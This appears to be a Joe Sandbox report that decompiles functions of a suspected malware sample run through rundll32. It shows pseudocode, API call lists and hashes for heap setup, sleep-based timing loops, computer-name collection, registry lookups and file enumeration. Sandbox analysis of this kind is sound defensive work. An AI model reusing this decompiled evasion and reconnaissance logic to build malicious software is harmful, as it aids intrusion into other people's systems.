                                          control_flow_graph 389 4fd90a1-4fd90b7 HeapCreate 390 4fd90be-4fd90d4 GetTickCount call 4fd6a7f 389->390 391 4fd90b9-4fd90bc 389->391 392 4fd911c 390->392 395 4fd90d6-4fd90d7 390->395 391->392 396 4fd90d8-4fd9100 SwitchToThread call 4fd1c04 Sleep 395->396 399 4fd9102-4fd910b call 4fd9511 396->399 402 4fd910d 399->402 403 4fd9117 call 4fd4908 399->403 402->403 403->392
                                          C-Code - Quality: 100%
                                          			E04FD90A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				signed int _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x4fdd238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0x4fdd1a8 = GetTickCount();
                                          				_t7 = E04FD6A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E04FD1C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E04FD9511(_t15) != 0) {
                                          						 *0x4fdd260 = 1; // executed
                                          					}
                                          					_t13 = E04FD4908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}












                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04FD6F11,?), ref: 04FD90AA
                                          • GetTickCount.KERNEL32 ref: 04FD90BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 04FD90D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 04FD90F7
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 5b42eb50fb873d95700fa039818c6385378ab352558fea93a834bcff7d2e6e93
                                          • Instruction ID: c9d72ea0e34aa806ae176fac01b7ce5798c4c5e7ea7bed3476fe5760516c306e
                                          • Opcode Fuzzy Hash: 5b42eb50fb873d95700fa039818c6385378ab352558fea93a834bcff7d2e6e93
                                          • Instruction Fuzzy Hash: F0F09C72A413086BF7107FB4BC4CF5A7BA7EF49759F084025E905D7140E778E802C661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 405 4fd68cf-4fd68e9 call 4fd9138 408 4fd68ee-4fd6910 call 4fd1b13 405->408 409 4fd68eb 405->409 412 4fd69cf-4fd69d4 408->412 413 4fd6916-4fd6930 StrToIntExW 408->413 409->408 414 4fd69db-4fd69e1 412->414 415 4fd69d6 call 4fd568a 412->415 416 4fd69bf-4fd69c1 413->416 417 4fd6936-4fd6952 call 4fd5fcb 413->417 415->414 420 4fd69c2-4fd69cd HeapFree 416->420 417->420 422 4fd6954-4fd696d call 4fd75e7 417->422 420->412 425 4fd698f-4fd69ab call 4fd1bc1 422->425 426 4fd696f-4fd6976 422->426 430 4fd69b0-4fd69bd HeapFree 425->430 426->425 427 4fd6978-4fd698a call 4fd75e7 426->427 427->425 430->420
                                          C-Code - Quality: 100%
                                          			E04FD68CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				void* _t40;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E04FD9138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t4 = _t24 + 0x4fdede0; // 0x7529388
                                          				_t5 = _t24 + 0x4fded88; // 0x4f0053
                                          				_t26 = E04FD1B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x4fdd2a4; // 0x254a5a8
                                          						_t11 = _t32 + 0x4fdedd4; // 0x752937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x4fded88; // 0x4f0053
                                          						_t51 = E04FD5FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0x4fdd2a4; // 0x254a5a8
                                          							_t13 = _t35 + 0x4fdea59; // 0x30314549
                                          							if(E04FD75E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0x4fdd25c - 6;
                                          								if( *0x4fdd25c <= 6) {
                                          									_t42 =  *0x4fdd2a4; // 0x254a5a8
                                          									_t15 = _t42 + 0x4fdec3a; // 0x52384549
                                          									E04FD75E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x4fdd2a4; // 0x254a5a8
                                          							_t17 = _t38 + 0x4fdee18; // 0x75293c0
                                          							_t18 = _t38 + 0x4fdedf0; // 0x680043
                                          							_t40 = E04FD1BC1(_v8, 0x80000001, _t51, _t18, _t17); // executed
                                          							_t45 = _t40;
                                          							HeapFree( *0x4fdd238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0x4fdd238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E04FD568A(_t53);
                                          				}
                                          				return _t45;
                                          			}



















                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,07529388,00000000,?,7519F710,00000000,7519F730), ref: 04FD691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,075293C0,?,00000000,30314549,00000014,004F0053,0752937C), ref: 04FD69BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04FD9C10), ref: 04FD69CD
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 84be74839cf415ccd0d32292fb2f40a0d1faa19c58a12b83da0b2eab22dc55c6
                                          • Instruction ID: ac18c35246cf348f7ef99f98cd54174456158be56f71756b1f2fa3466961f04a
                                          • Opcode Fuzzy Hash: 84be74839cf415ccd0d32292fb2f40a0d1faa19c58a12b83da0b2eab22dc55c6
                                          • Instruction Fuzzy Hash: BF316B72A00109BFEB11EBA4ED84EAE7BBFEF04704F190169B505AB150D771EE06DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04FD9F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
                                          				void* _t31;
                                          				void* _t37;
                                          				void* _t41;
                                          				intOrPtr _t43;
                                          				void* _t44;
                                          
                                          				_t37 = __edx;
                                          				_t33 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t43 =  *0x4fdd2a4; // 0x254a5a8
                                          				_push(0x800);
                                          				_push(0);
                                          				_push( *0x4fdd238);
                                          				_t1 = _t43 + 0x4fde791; // 0x6976612e
                                          				_t44 = _t1;
                                          				if( *0x4fdd24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0x4fdd24c =  *0x4fdd24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E04FD7CF7(_a4, _t41); // executed
                                          						_t19 = E04FD60CF(_t41, _t41, _t46); // executed
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0x4fdd24c < 5) {
                                          								 *0x4fdd24c =  *0x4fdd24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E04FD6106();
                                          						RtlFreeHeap( *0x4fdd238, 0, _t41); // executed
                                          						goto L10;
                                          					}
                                          					_t25 = E04FD514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				if(RtlAllocateHeap() == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E04FD1754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}













                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04FD9F3B
                                            • Part of subcall function 04FD1754: GetTickCount.KERNEL32 ref: 04FD1768
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD17B8
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD17D5
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD1801
                                            • Part of subcall function 04FD1754: HeapFree.KERNEL32(00000000,?), ref: 04FD1813
                                            • Part of subcall function 04FD1754: wsprintfA.USER32 ref: 04FD1834
                                            • Part of subcall function 04FD1754: HeapFree.KERNEL32(00000000,?), ref: 04FD1844
                                            • Part of subcall function 04FD1754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04FD1872
                                            • Part of subcall function 04FD1754: GetTickCount.KERNEL32 ref: 04FD1883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04FD9F59
                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,04FD9C62,00000002,?,?,?,?), ref: 04FD9FB6
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 69507fe3b5867d823cf656e96ea75c381031b7e7dc76bf507ecf7139792621cd
                                          • Instruction ID: a3a66bb6f058d891757eaa79ec998c142f2fdb20829bbb4fb9c12e66658ea712
                                          • Opcode Fuzzy Hash: 69507fe3b5867d823cf656e96ea75c381031b7e7dc76bf507ecf7139792621cd
                                          • Instruction Fuzzy Hash: 3F2180B6201209EBEB15AFA8EC44E9A37AEEF48345F044015F902DB240D7B4FD46DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E04FD642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E04FD4FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x4fdd2a4; // 0x254a5a8
                                          						_t20 = _t68 + 0x4fde1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E04FD5103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}

                                          APIs
                                            • Part of subcall function 04FD4FFA: SysAllocString.OLEAUT32(80000002), ref: 04FD5057
                                            • Part of subcall function 04FD4FFA: SysFreeString.OLEAUT32(00000000), ref: 04FD50BD
                                          • SysFreeString.OLEAUT32(?), ref: 04FD650B
                                          • SysFreeString.OLEAUT32(04FDA6F4), ref: 04FD6515
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: fad7f6927827a51375c05fefd9d97cfbb957c90b06715cb73909f41f3b8e0128
                                          • Instruction ID: e2b1e0120918f85f1df8459a1639838abb165d7298fdf520b60b708d8361852d
                                          • Opcode Fuzzy Hash: fad7f6927827a51375c05fefd9d97cfbb957c90b06715cb73909f41f3b8e0128
                                          • Instruction Fuzzy Hash: 64312872900159AFDB21DF68CC88C9BBB7AFFC97447194658F815DB214E231ED92CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(04FD9642), ref: 04FD6C81
                                            • Part of subcall function 04FD642C: SysFreeString.OLEAUT32(?), ref: 04FD650B
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD6CC2
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: c15ede995921f9de943bac511a6c341e2f1fd3f93d8955703235b48c6a05de8b
                                          • Instruction ID: 0251c430999c281dda16e77c7a48f4dfa8fd2d6de9f41d68613ed7198f8e4612
                                          • Opcode Fuzzy Hash: c15ede995921f9de943bac511a6c341e2f1fd3f93d8955703235b48c6a05de8b
                                          • Instruction Fuzzy Hash: 6E01623650110EBFDB019FA8D9088AF7BBAEF48711B054126F909E7121E7309D15CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04FD73E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E04FD58BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E04FD147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04FD51DC,7519F710,00000000,?,?,04FD51DC), ref: 04FD7401
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,04FD51DC,04FD51DD,?,?,04FD51DC), ref: 04FD741E
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 3a15cac9f287db6b99271565458d858f82c27bad0700404a52e32b37ad1cfb85
                                          • Instruction ID: d8396fbd6f6b4b3e9e4ebb0a8d6359176b441b15cb83cb3196c4fc0398f21d12
                                          • Opcode Fuzzy Hash: 3a15cac9f287db6b99271565458d858f82c27bad0700404a52e32b37ad1cfb85
                                          • Instruction Fuzzy Hash: 4AF05B26A40149FAE711EAB58D05E9F7AFEDBC6650F190059A504D7140EA74FF0296B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E04FD7BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t4 = _t15 + 0x4fde39c; // 0x7528944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x4fde124; // 0x650047
                                          				_t17 = E04FD642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E04FD4CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}

                                          APIs
                                            • Part of subcall function 04FD642C: SysFreeString.OLEAUT32(?), ref: 04FD650B
                                            • Part of subcall function 04FD4CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04FD358E,004F0053,00000000,?), ref: 04FD4CDC
                                            • Part of subcall function 04FD4CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04FD358E,004F0053,00000000,?), ref: 04FD4D06
                                            • Part of subcall function 04FD4CD3: memset.NTDLL ref: 04FD4D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD7C0C
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: e2c4452feef3dee49a592a1a15acf8d37d3d8e60e727bfd349619ad26c339ed8
                                          • Instruction ID: 62dd39508604a8ac0f60358896c6cbe9a4b1cbc440a01984d23ad0972d512d38
                                          • Opcode Fuzzy Hash: e2c4452feef3dee49a592a1a15acf8d37d3d8e60e727bfd349619ad26c339ed8
                                          • Instruction Fuzzy Hash: 4B017C3260051ABFEB11AFA8DD049ABBBFAEB08254F044525ED05EB161E371E952CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD58BE(long _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = RtlAllocateHeap( *0x4fdd238, 0, _a4); // executed
                                          				return _t2;
                                          			}




                                          0x04fd58ca
                                          0x04fd58d0

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 0820bd628f1d4489f0bbd425bd497c08d0e3c520823d0e57feccc229e6597a4a
                                          • Instruction ID: c748d19b5b7ef46438dcc205e75d215cb804ad96c52edfa4af766566f6aa21c2
                                          • Opcode Fuzzy Hash: 0820bd628f1d4489f0bbd425bd497c08d0e3c520823d0e57feccc229e6597a4a
                                          • Instruction Fuzzy Hash: 2AB01231001104EBDF015F60FD0CF05BB23EB50701F028014B200440B483354C20FB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E04FD9347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0x4fdd330;
                                          				E04FD684E();
                                          				while(1) {
                                          					_t8 = E04FD32BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E04FDA5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0x4fdd238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E04FD684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0x4fdd338; // 0x7529b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}

                                          APIs
                                            • Part of subcall function 04FD684E: GetProcAddress.KERNEL32(36776F57,04FD935F), ref: 04FD6869
                                            • Part of subcall function 04FD32BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04FD32E5
                                            • Part of subcall function 04FD32BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04FD3307
                                            • Part of subcall function 04FD32BA: memset.NTDLL ref: 04FD3321
                                            • Part of subcall function 04FD32BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04FD335F
                                            • Part of subcall function 04FD32BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04FD3373
                                            • Part of subcall function 04FD32BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 04FD338A
                                            • Part of subcall function 04FD32BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04FD3396
                                            • Part of subcall function 04FD32BA: lstrcat.KERNEL32(?,642E2A5C), ref: 04FD33D7
                                            • Part of subcall function 04FD32BA: FindFirstFileA.KERNEL32(?,?), ref: 04FD33ED
                                            • Part of subcall function 04FDA5E9: lstrlen.KERNEL32(?,00000000,04FDD330,00000001,04FD937A,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?), ref: 04FDA5F2
                                            • Part of subcall function 04FDA5E9: mbstowcs.NTDLL ref: 04FDA619
                                            • Part of subcall function 04FDA5E9: memset.NTDLL ref: 04FDA62B
                                          • HeapFree.KERNEL32(00000000,04FDD00C,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?,04FDD00C,?,?), ref: 04FD9396
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 979ac44a524f2191716c22b768c42fcb7fc121b3088bf7f6f1bdab740f417261
                                          • Instruction ID: 26ff0837891a7f60a927665dbc20c67e97ad8d0d56a61565aa5f39daae25912a
                                          • Opcode Fuzzy Hash: 979ac44a524f2191716c22b768c42fcb7fc121b3088bf7f6f1bdab740f417261
                                          • Instruction Fuzzy Hash: C30128B2600205AAF7106FE6DD84F7E76AFEB45364F0C0035F948C60A0D6A4FD839361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD1B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E04FD7BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E04FD74B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0x4fdd238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}








                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04FD690C,?,004F0053,07529388,00000000,?), ref: 04FD1B60
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 61ef488e7445729efea19a69bd5507a4337dc18fc9ed6588bbcbad42fcd733da
